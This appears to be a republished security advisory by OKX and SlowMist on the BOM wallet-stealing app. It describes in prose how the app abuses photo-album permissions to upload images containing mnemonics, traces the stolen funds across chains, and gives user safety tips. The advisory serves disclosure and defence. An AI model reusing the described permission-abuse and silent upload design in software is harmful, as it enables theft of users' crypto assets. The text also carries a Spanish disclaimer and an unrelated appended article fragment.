OKX SlowMist jointly released | Bom malware swept tens of thousands of users and stole assets exceeding $1.82 million

On February 14, 2025, many users reported that their wallet assets were stolen. After on-chain data analysis, the theft cases all met the characteristics of mnemonic/private key leakage. After further revisiting the victim users, it was found that most of them had installed and used an application called BOM. In-depth investigations showed that the application was actually a carefully disguised fraud software. After the criminals induced users to authorize through the software, they illegally obtained mnemonic/private key permissions, and then implemented systematic asset transfers and concealment. Therefore, the SlowMist AML team and the OKX Web3 security team investigated and disclosed the modus operandi of the malware, and conducted on-chain tracking analysis, hoping to provide more users with security warnings and suggestions.

1. Malware Analysis (OKX)

With the users consent, the OKX Web3 security team collected the apk files of the BOM application on some users phones for analysis. The details are as follows:

1. Conclusion

1. After entering the contract page, the malicious app deceives users into authorizing local file and album permissions on the grounds that it is necessary for the application to run.

2. After obtaining user authorization, the app scans and collects media files in the devices photo album in the background, packages them and uploads them to the server. If the users files or photo albums contain information related to mnemonics and private keys, criminals may use the relevant information collected by the app to steal the users wallet assets.

2. Analysis process

1. Preliminary analysis of samples

1) Application signature analysis

The signature subject is not standardized. After parsing, it is adminwkhvjv, which is a bunch of meaningless random characters. Normal applications usually use a meaningful combination of letters.

2) Malicious permissions analysis

In the AndroidManifest file of the app, we can see that a large number of permissions are registered, including some information-sensitive permissions, including reading and writing local files, reading media files, and photo albums.

2. Dynamic Analysis

Because the apps backend interface service was offline during analysis, the app could not run normally and dynamic analysis could not be performed for the time being.

3. Decompilation analysis

After decompilation, we found that the number of classes in the dex of this application was very small, and we performed static analysis on these classes at the code level.

Its main logic is to decrypt some files and load the application:

The product files of uniapp are found in the assets directory, indicating that the app was developed using the cross-platform framework uniapp:

The main logic of the application developed under the uniapp framework is in the product file app-service.js. Some key codes are encrypted in app-confusion.js. We mainly start the analysis from app-service.js.

1) Trigger entry

At the entrance of each registration page, I found the entrance called contract page

The corresponding function index is 6596

2) Initialization reporting of device information

The callback onLoad() after the contract page is loaded will call doContract()

initUploadData() is called in doContract()

In initUploadData(), the network status will be checked first, and the image and video lists will also be checked to see if they are empty. Finally, the callback e() will be called.

The callback e() is getAllAndIOS(),

3) Check and request permissions

Here, iOS will first request permissions and deceive users into agreeing with the copy that the application needs to run normally. The request for authorization here is quite suspicious. As a blockchain-related application, its normal operation has no necessary connection with the permissions of the photo album. This request obviously exceeds the normal requirements for the operation of the application.

On Android, you also need to determine and apply for photo album permissions first.

4) Collect and read album files

Then read the pictures and videos in androidDoingUp and package them.

5) Upload album files

Finally, upload the file in uploadBinFa(), uploadZipBinFa() and uploadDigui(). You can see that the upload interface path is also a random string of characters.

The iOS process is similar. After obtaining the permission, iOS starts collecting uploaded content through getScreeshotAndShouchang().

6) Upload interface

The commonUrl domain name in the reported URL comes from the return of the /api/bf 9023/c 99 so interface.

The domain of this interface comes from the local cache of uniapp.

The code for writing to the cache was not found. It may be encrypted and obfuscated and exists in app-confusion.js. The domain was seen in the application cache during a historical run.

2. On-chain Funding Analysis (SlowMist)

According to the analysis of MistTrack, an on-chain tracking and anti-money laundering tool under SlowMist AML, the current main coin theft address (0x49aDd3E8329f2A2f507238b0A684d03EAE205aab) has stolen funds from at least 13,000 users and made a profit of more than 1.82 million US dollars.

(https://dune.com/queries/4721460)

The first transaction of the address 0x49aDd3E8329f2A2f507238b0A684d03EAE205aab occurred on February 12, 2025, and 0.001 BNB was transferred from the address 0x9AEf1CA082c17f9D52Aa98ca861b50c776dECC35 as the initial capital:

Analyzing the address 0x9AEf1CA082c17f9D52Aa98ca861b50c776dECC35, the first transaction of this address also appeared on February 12, 2025. Its initial funds came from the address 0x71552085c854EeF431EE55Da5B024F9d845EC976 marked as Theft-Stolen Private Key by MistTrack:

Continue to analyze the funds flow of the initial hacker address 0x49aDd3E8329f2A2f507238b0A684d03EAE205aab:

BSC: Profit of about $37,000, including USDC, USDT, WBTC and other currencies, often using PancakeSwap to exchange some tokens for BNB:

The current address balance is 611 BNB and tokens worth approximately $120,000, such as USDT, DOGE, and FIL.

Ethereum: Profit of about $280,000, most of which came from ETH transferred from other chains. Then 100 ETH was transferred to 0x7438666a4f60c4eedc471fa679a43d8660b856e0. This address also received 160 ETH transferred from the above address 0x71552085c854EeF431EE55Da5B024F9d845EC976. A total of 260 ETH has not been transferred out yet.

Polygon: Profit of about 37,000 or 65,000 US dollars, including WBTC, SAND, STG and other currencies. Most of the tokens have been exchanged for 66,986 POL through OKX-DEX. The current balance of the hacker address is as follows:

Arbitrum: Profit of about $37,000, including USDC, USDT, WBTC and other currencies, tokens converted to ETH, a total of 14 ETH cross-chain to Ethereum through OKX-DEX:

Base: Profit of about $12,000, including FLOCK, USDT, MOLLY and other currencies, tokens converted to ETH, a total of 4.5 ETH cross-chain to Ethereum through OKX-DEX:

The remaining chains will not be described in detail. We also made a brief analysis of another hacker address provided by the victim.

The first transaction of the hacker address 0xcb6573E878d1510212e84a85D4f93Fd5494f6EA0 appeared on February 13, 2025, with a profit of about 650,000 US dollars, involving multiple chains, and the relevant USDT was cross-chain to the TRON address TFW52pZ3GPPUNW847rdefZjqtTRxTCsdDx:

The address TFW52pZ3GPPUNW847rdefZjqtTRxTCsdDx received a total of 703,119.2422 USDT, with a balance of 288,169.2422 USDT, of which 83,000 USDT was transferred to the address TZJiMbiqBBxDXhZXbrtyTYZjVDA2jd4eus and was not transferred out, and the remaining 331,950 USDT was transferred to the address THKqT6PybrzcxkpFBGSPyE11kemRNRmDDz that had interacted with Huionepay.

We will continue to monitor the relevant balance addresses.

3. Recomendaciones de seguridad

To help users improve their protection awareness, the SlowMist AML team and the OKX Web3 security team have compiled the following security recommendations:

1. Never download software from unknown sources (including so-called wool-pulling tools and any software from unknown publishers).

2. Never trust software download links recommended by friends or communities, always download from official channels.

3. Download and install apps from regular channels, including Google Play, App Store, and major official app stores.

4. Keep the mnemonics properly and do not save them by taking screenshots, taking photos, saving them in a notepad, or using a cloud disk. The OKX wallet mobile app has prohibited screenshots of the private key and mnemonics pages.

5. Use physical methods to save mnemonics, such as copying them on paper, saving them in hardware wallets, segmented storage (split the mnemonics/private keys and store them in different locations), etc.

6. Change your wallet regularly. If possible, changing your wallet regularly can help eliminate potential security risks.

7. Use professional on-chain tracking tools, such as MistTrack (https://misttrack.io/), to monitor and analyze funds, reduce the risk of fraud or phishing, and better protect asset security.

8. It is highly recommended to read Blockchain Dark Forest Self-Rescue Manual written by Yu Xian, the founder of SlowMist.

Descargo de responsabilidad

Este contenido es solo de referencia y no constituye ni debe considerarse (i) asesoramiento o recomendación de inversión, (ii) una oferta o solicitud para comprar, vender o mantener activos digitales, o (iii) asesoramiento financiero, contable, legal o fiscal. No garantizamos la precisión, integridad o utilidad de dicha información. Los activos digitales (incluidas las monedas estables y los NFT) están sujetos a fluctuaciones del mercado, implican altos riesgos, pueden depreciarse en valor o incluso perder su valor. Debe considerar cuidadosamente si operar o mantener activos digitales es adecuado para usted en función de su situación financiera y tolerancia al riesgo. Consulte a su profesional legal/fiscal/de inversiones para su situación específica. No todos los productos están disponibles en todas las regiones. Para obtener más detalles, consulte los Términos de servicio de OKX y el Descargo de responsabilidad de divulgación de riesgos. OKX Web3 Mobile Wallet y sus servicios derivados están sujetos a términos de servicio separados. Sea responsable de comprender y cumplir con las leyes y regulaciones locales aplicables.

This article is sourced from the internet: OKX SlowMist jointly released | Bom malware swept tens of thousands of users and stole assets exceeding $1.82 million

Related: $JAILSTOOL quick review: A celebrity tweet soared to a market value of $150 million in 3 hours

Original author: Deebs DeFi Original translation: TechFlow This is Dave Portnoy. The millionaire business tycoon once pushed a meme coin to a market value of $150 million in just 3 hours. But who is @stoolpresidente ? Is he a hero or a fraud? Here is his full story. Dave Portnoy, nicknamed El Presidente, is an American entrepreneur best known for founding Barstool Sports. Barstool Sports started out as a small sports newspaper he distributed in subways but grew into a multimillion-dollar empire. Barstool isnt Daves only claim to fame, though. Dave is also a well-known influencer. He has attracted attention in the United States for his sharp pizza reviews and crazy sports betting. So it’s no surprise that Dave has jumped into another exciting field: cryptocurrency, which is known as…